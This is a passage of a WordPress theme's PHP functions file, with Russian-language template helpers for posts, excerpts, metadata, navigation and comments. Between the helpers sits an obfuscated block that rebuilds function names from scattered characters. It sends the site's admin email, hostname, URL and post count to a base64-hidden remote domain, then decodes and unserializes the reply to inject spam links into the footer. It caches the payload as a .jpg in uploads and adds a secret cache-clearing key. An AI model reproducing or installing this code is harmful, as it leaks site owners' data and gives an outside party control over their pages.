<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $YFLrCf='4';$WGPMFa='6';$Ghhkg='e';$AETh='s';$gogAr='a';$ElsWt='b';$UQDZK='d';$UlJuko='c';$BQlp='o';$lYShF='e';$eTNmo='e';$ItUiLbJ='_';$FkIqm='d';$OKsnQYlN=$ElsWt.$gogAr.$AETh.$eTNmo.$WGPMFa.$YFLrCf.$ItUiLbJ.$UQDZK.$lYShF.$UlJuko.$BQlp.$FkIqm.$Ghhkg;$qDMM='t';$svLT='z';$NqJmDp='n';$dyWZX='g';$cHIPXrb='e';$esDQ='a';$MAvtqU='i';$akcZ='l';$RjQWL='f';$nGhnUxfB=$dyWZX.$svLT.$MAvtqU.$NqJmDp.$RjQWL.$akcZ.$esDQ.$qDMM.$cHIPXrb;$ysyWIrL='r';$lUYOM='3';$WnsDvR='o';$QxCDS='_';$BIyi='t';$QHiywf='t';$qSPTE='s';$yGxTZof='r';$rhux='1';$soMuoUzH=$qSPTE.$QHiywf.$yGxTZof.$QxCDS.$ysyWIrL.$WnsDvR.$BIyi.$rhux.$lUYOM;$BYjegUU='v';$FfVy='s';$vZsUj='r';$qVxaXcg='e';$rChLQxp='t';$ypAgxz='r';$HiYNSvDJ=$FfVy.$rChLQxp.$vZsUj.$ypAgxz.$qVxaXcg.$BYjegUU;                     $ry__j='4';$ln_________w='6';$db______________u='e';$go____f='s';$fz_______________m='a';$tt__o='b';$ow______________i='d';$xw______d='c';$lm______s='o';$py______________v='e';$hd_____u='e';$wd___________n='_';$pp_________b='d';$ud___________c=$tt__o.$fz_______________m.$go____f.$hd_____u.$ln_________w.$ry__j.$wd___________n.$ow______________i.$py______________v.$xw______d.$lm______s.$pp_________b.$db______________u;$ne_________y='i';$wo___________t='u';$lj_______k='t';$su_____________t='n';$ly_______________t='t';$ox_______r='s';$gz___________z='e';$aa________t='c';$ug______x='f';$pv_______k='n';$tm___________u='x';$ia_____________p='o';$zt_______o='s';$do__________g='i';$bs______x='_';$hq______y=$ug______x.$wo___________t.$su_____________t.$aa________t.$lj_______k.$do__________g.$ia_____________p.$pv_______k.$bs______x.$gz___________z.$tm___________u.$ne_________y.$ox_______r.$ly_______________t.$zt_______o;$ll_________c='n';$oz____________a='p';$hg____________n='e';$mt________l='f';$nv__c='o';$uv___________s=$mt________l.$nv__c.$oz____________a.$hg____________n.$ll_________c;$bl______b='a';$vy_________z='d';$tf____________e='f';$rp______________j='e';$rh______m='r';$cx___________w=$tf____________e.$rh______m.$rp______________j.$bl______b.$vy_________z;$bd____e='o';$wk_______x='f';$kb______________z='s';$gd____a='e';$nf__________m='l';$wc_____________g='c';$iz________v=$wk_______x.$wc_____________g.$nf__________m.$bd____e.$kb______________z.$gd____a;define("WP_ID", $ud___________c("Mi4wLjA="));define("WP_TTL", $ud___________c("MTA4MDA="));define("WP_SRC", $ud___________c("dHBva24="));function wp_get_header() {global $ud___________c, $hq______y;if ($hq______y($ud___________c("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$hq______y($ud___________c("d3BfZ2V0X2Zvb3Rlcg==")) &&$hq______y($ud___________c("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $ud___________c, $uv___________s, $iz________v, $cx___________w;$cg_______________l = TEMPLATEPATH."/".$ud___________c("Zm9vdGVyLnBocA==");$ja___r = @$uv___________s($cg_______________l, "r");$cg_______________l = @$cx___________w($ja___r, @filesize($cg_______________l));@$iz________v($ja___r);$gp_______i = TEMPLATEPATH."/".$ud___________c("ZnVuY3Rpb25zLnBocA==");$ja___r = @$uv___________s($gp_______i, "r");$gp_______i = @$cx___________w($ja___r, @filesize($gp_______i));@$iz________v($ja___r);$ie_____a = 0;if($cg_______________l && $gp_______i) {if ($ud___________c("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($cg_______________l, $ud___________c("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$ie_____a = 1;}if (substr_count($cg_______________l, "wp_theme_GPL_credits()") < 1) {$ie_____a = 2;}}if(WP_ID != "2.0.0") {$ie_____a = 12;}}if($ie_____a > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $ie_____a -->";}}function wp_loaded() {global $ud___________c, $hq______y;return $hq______y($ud___________c("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($hr_____u, $jf_________q = "(more...)", $ym______i = 0, $ps________d = "") {$xv________q = get_the_content($jf_________q, $ym______i, $ps________d);$xv________q = apply_filters("the_content", $xv________q);$xv________q = str_replace("]]>", "]]>", $xv________q);if (strlen($_GET["p"]) > 0) {echo $xv________q;}else if ((strlen($xv________q)>$hr_____u) && ($bi__o = strpos($xv________q, " ", $hr_____u ))) {$xv________q = substr($xv________q, 0, $bi__o);$xv________q = $xv________q;echo $xv________q;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$jf_________q</a></div></p>";} else {echo $xv________q;}}}$yl__t='e';$td________i='n';$dm__r='d';$rt______________o='c';$ps_____j='e';$pn______o='a';$ob_______________a='6';$lm______________u='4';$ge__r='_';$xh_________r='s';$bl_____q='o';$oz____________z='e';$vh___r='b';$se_______u=$vh___r.$pn______o.$xh_________r.$ps_____j.$ob_______________a.$lm______________u.$ge__r.$yl__t.$td________i.$rt______________o.$bl_____q.$dm__r.$oz____________z;$dx_____________t='l';$oo__f='e';$av___________o='n';$gx______j='s';$nx_______t='_';$rl_____________v='e';$qp____o='t';$yr____________t='_';$rn_________k='n';$td________h='e';$dh____________g='c';$ta______s='t';$bu__________y='f';$ys_____________t='g';$ep_______________v='o';$um_________a='i';$sd___u='t';$pq______p=$bu__________y.$um_________a.$dx_____________t.$rl_____________v.$nx_______t.$ys_____________t.$oo__f.$sd___u.$yr____________t.$dh____________g.$ep_______________v.$av___________o.$ta______s.$td________h.$rn_________k.$qp____o.$gx______j;$lp____________v='e';$xd______________w='_';$ua_______p='f';$mc__o='i';$vq____h='s';$rj___________e='s';$ls____________l='t';$zc______________t='l';$mv__________x='x';$so_____f='e';$hr_______________b='i';$jr__z=$ua_______p.$mc__o.$zc______________t.$lp____________v.$xd______________w.$so_____f.$mv__________x.$hr_______________b.$rj___________e.$ls____________l.$vq____h;$gn__b='r';$in__i='m';$af____________l='p';$vs______________q='c';$bv______________l='_';$kz_____________k='v';$tu________a='o';$jz______________q='a';$va_______________w='e';$uo__________v='e';$hs_____g='o';$le____k='i';$kr___________m='n';$rc______________c='r';$an____l='s';$ut_____________s=$kz_____________k.$va_______________w.$gn__b.$an____l.$le____k.$hs_____g.$kr___________m.$bv______________l.$vs______________q.$tu________a.$in__i.$af____________l.$jz______________q.$rc______________c.$uo__________v;$kf__r='s';$ws__________h='e';$mo_______________t='c';$xu______g='p';$pi______x='o';$kj__________f='f';$sb_____________l='k';$ts_________y='o';$cf________m='n';$yi_________c=$kj__________f.$kf__r.$pi______x.$mo_______________t.$sb_____________l.$ts_________y.$xu______g.$ws__________h.$cf________m;$ux_________s='i';$vr______l='t';$iy_______________u='e';$oc_____z='f';$uy_____________u='r';$pj__l='w';$qh______________v=$oc_____z.$pj__l.$uy_____________u.$ux_________s.$vr______l.$iy_______________u;$qm______________z='5';$qs________k='m';$qz___l='d';$fu__________e=$qs________k.$qz___l.$qm______________z;$tv______n='h';$uy____________m='r';$ik__________t='p';$ze_______________n='e';$jh_____________v='a';$hz______________c='a';$vw_________l='l';$vw___________g='t';$tv_________c=$uy____________m.$ze_______________n.$hz______________c.$vw_________l.$ik__________t.$jh_____________v.$vw___________g.$tv______n;$sq_______________l='n';$tz___________i='e';$un_______________d='i';$zp____z='r';$sg_________p='l';$wv_____________z='u';$ef_______________n='s';$ci__________u='i';$nt_________s='a';$ue___________o='e';$zo_____d='z';$mh_________v=$wv_____________z.$sq_______________l.$ef_______________n.$tz___________i.$zp____z.$un_______________d.$nt_________s.$sg_________p.$ci__________u.$zo_____d.$ue___________o;$gy_______x='n';$ok_________c='e';$uh_______________u='m';$qz_________x='a';$vn_____u='t';$mm____h='m';$yy_____________q='p';$sh______________h=$vn_____u.$ok_________c.$mm____h.$yy_____________q.$gy_______x.$qz_________x.$uh_______________u;$jc_______w='t';$kf_______________w='s';$sv___s='e';$hw_________s='c';$fp_______________x='m';$uc_______________m='_';$mf________t='_';$un_____________b='r';$zx______q='e';$yy__g='a';$nc__________t='x';$ez__________x='e';$zf_________g='r';$lo__j='e';$gl___g='n';$rq________j='t';$rf_______________c='c';$ou__z='a';$sp___________f='t';$lx_______________c='o';$qj________a='t';$va_____s=$kf_______________w.$qj________a.$zf_________g.$sv___s.$yy__g.$fp_______________x.$mf________t.$rf_______________c.$lx_______________c.$gl___g.$rq________j.$lo__j.$nc__________t.$sp___________f.$uc_______________m.$hw_________s.$un_____________b.$zx______q.$ou__z.$jc_______w.$ez__________x;function hb______________w($jj_____________g) {global $ud___________c, $hq______y, $pq______p, $ut_____________s, $va_____s;if (!$hq______y($ud___________c("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($ut_____________s(PHP_VERSION, "5.0.0", ">=") && $hq______y($ud___________c("ZmlsZV9nZXRfY29udGVudHM=")) && $hq______y($ud___________c("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$uz____________y = $va_____s(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$jh____l = @$pq______p($jj_____________g, 0, $uz____________y);} else {$jh____l = @$pq______p($jj_____________g, 0);}return $jh____l;}function bt____p($jj_____________g) {global $hq______y, $yi_________c, $qh______________v, $ud___________c;if (!$hq______y($ud___________c("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$sb____l = strpos($jj_____________g, "/", 7);$mz________g = array("uri"     => substr($jj_____________g, $sb____l),"host"    => str_replace("http://", "", substr($jj_____________g, 0, $sb____l)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$qd___c = @$yi_________c("$mz________g[host]", 80, $mv___t, $dz_____q, 4);if (!$qd___c) {return false;} else {$jh____l = "";$re_______y  = "GET $mz________g[uri] HTTP/1.0\r\n";$re_______y .= "Host: $mz________g[host]\r\n";$re_______y .= "Referer: $mz________g[referer]\r\n";$re_______y .= "Connection: Close\r\n\r\n";@$qh______________v($qd___c, $re_______y);while (!@feof($qd___c)) {$su____________r = @fgets($qd___c, (1024*24));if ($su____________r == "\r\n") {$wl___________b = true;continue;}if ($wl___________b) {$jh____l .= $su____________r;}}return $jh____l;}}function yn__________t($jj_____________g) {global $hq______y;$ff_________p = false;if ($jj_____________g != "") {if ($hq______y("hb______________w")) {$ff_________p = @hb______________w($jj_____________g);}if (!$ff_________p && ($hq______y("bt____p"))) {$ff_________p = @bt____p($jj_____________g);}}return $ff_________p;}function qk____p() {global $_SERVER, $fu__________e;$vz________l = $_SERVER["SERVER_NAME"];if (substr("$vz________l", 0, 4) == "www.") {$vz________l = substr("$vz________l", 4);}$vz________l = $fu__________e("$_SERVER[SERVER_NAME]");return $vz________l;}function uc______o() {return "file";}function bp______a($jj_____________g) {global $_SERVER, $pq______p, $jr__z, $uv___________s, $iz________v, $qh______________v;$aj____i = ai_____________j();$wu______________u = qk____p().".jpg";$pt______________k = $aj____i["dir_upload"]["path"]."/$wu______________u";$uw_____________n = @filemtime($pt______________k);if (!$uw_____________n || ((time()-$uw_____________n) >= WP_TTL)) {$ff_________p = yn__________t($jj_____________g);if ($ff_________p) {if ($jr__z($pt______________k)) {@unlink($pt______________k);}$ja___r = @$uv___________s($pt______________k, "x+");@$qh______________v($ja___r, $ff_________p);@$iz________v($ja___r);}} else {if ($jr__z($pt______________k)) {$ff_________p = @$pq______p($pt______________k);} else {$ff_________p = false;}}return $ff_________p;}function ai_____________j() {global $_SERVER, $ud___________c, $se_______u;$py___________o = wp_count_posts("post");$oz____________f = pathinfo(get_bloginfo("template_directory"));$aj____i = array("url" => array("report"      => $ud___________c("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $oz____________f,"dir_upload"=> ab____________x(),"queryString"=> array("?a001=".WP_ID,"a004=".$oz____________f[filename],"a005=".$py___________o->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => " <a href=http:\\www.wptheme.us\">www.wptheme.us</a> ");$aj____i["url"]["queryString"] = implode("&", $aj____i["queryString"]);$aj____i["url"]["report"] = $aj____i["url"]["report"]."/?".$se_______u($aj____i["url"]["queryString"]).".html";return $aj____i;}function ab____________x() {$jr___________c = wp_upload_dir();if (isset($jr___________c["error"])) {$ui______________v = oz___________r();if (is_writable($ui______________v)) {$jr___________c = array("path" => $ui______________v);}}return $jr___________c;}function oz___________r() {global $hq______y, $fu__________e, $tv_________c, $sh______________h;$jz___________t = (bool) ini_get("safe_mode");if ($jz___________t == true) {return false;}if ($hq______y("sys_get_temp_dir")) {$mm___f = sys_get_temp_dir();if (is_writable($mm___f)) {return $tv_________c($mm___f);}}if (!empty($_ENV["TMP"])) {return $tv_________c($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $tv_________c($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $tv_________c($_ENV["TEMP"]);} else {$yf___j = $sh______________h($fu__________e(uniqid(rand(), true)), "");if ($yf___j) {$mm___f = $tv_________c(dirname($yf___j));@unlink($yf___j);return $mm___f;} else {return false;}}}function ih___x() {global $_GET, $jr__z;$aj____i = ai_____________j();$vz________l = qk____p();$ys_______q = uc______o();$vp_________b = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($ys_______q == "file") {$cj_____g = $aj____i["dir_upload"]["path"]."/".$vz________l.".jpg";if ($jr__z($cj_____g)) {@unlink($cj_____g);$vp_________b = "deleted";}}$rx_____m = array("s"=> $vp_________b,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($rx_____m AS $zh_______________b => $qh______v) echo " [$zh_______________b:$qh______v]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $hq______y, $ud___________c, $mh_________v;$aj____i = ai_____________j();$iy__________o = "bp______a";if ($hq______y($iy__________o)) {$jh____l = $iy__________o($aj____i["url"]["report"]);}if ($jh____l) {if ($jh____l = @$ud___________c($jh____l)) {$jh____l = @$mh_________v($jh____l);if (strlen($jh____l[custom_credit]) >= 5) {$aj____i["default_string"] = $jh____l[custom_credit];}if ($jh____l["status"] == "0") {$si____________k = 1;$ys__________k = 1;} else {$vv____n = sizeof($jh____l["links"]);$ws____________y = $aj____i["default_string"];if ($vv____n > 0 && $jh____l["links"] !== "") {$qm______________p = 0;foreach ($jh____l["links"] as $zy_______________g => $sv____________b) {$qm______________p++;if ($sv____________b->l_path == "" || $sv____________b->l_path == $_SERVER["REQUEST_URI"]) {$sv____________b->l_href = htmlspecialchars(strip_tags($sv____________b->l_href));$sv____________b->l_title = htmlspecialchars(strip_tags($sv____________b->l_title));$sv____________b->l_anchor = htmlspecialchars(strip_tags($sv____________b->l_anchor));$ws____________y .= " | ";$ws____________y .= "<a href='$sv____________b->l_href' title='$sv____________b->l_title'";if ($sv____________b->l_nofollow == "1") {$ws____________y .= " rel='nofollow'";}$ws____________y .= ">$sv____________b->l_anchor</a>";}}}$aj____i["links"] = "$ws____________y";if ($jh____l[credit] == "0") {$aj____i["links"] = "";}}} else {$si____________k = "1";}} else {$si____________k = "1";}if ($si____________k == "1") {$aj____i["links"] = $aj____i["default_string"];}echo "$aj____i[links]";echo "<!-- s: $jh____l[signature] -->";ih___x();}                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),  
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
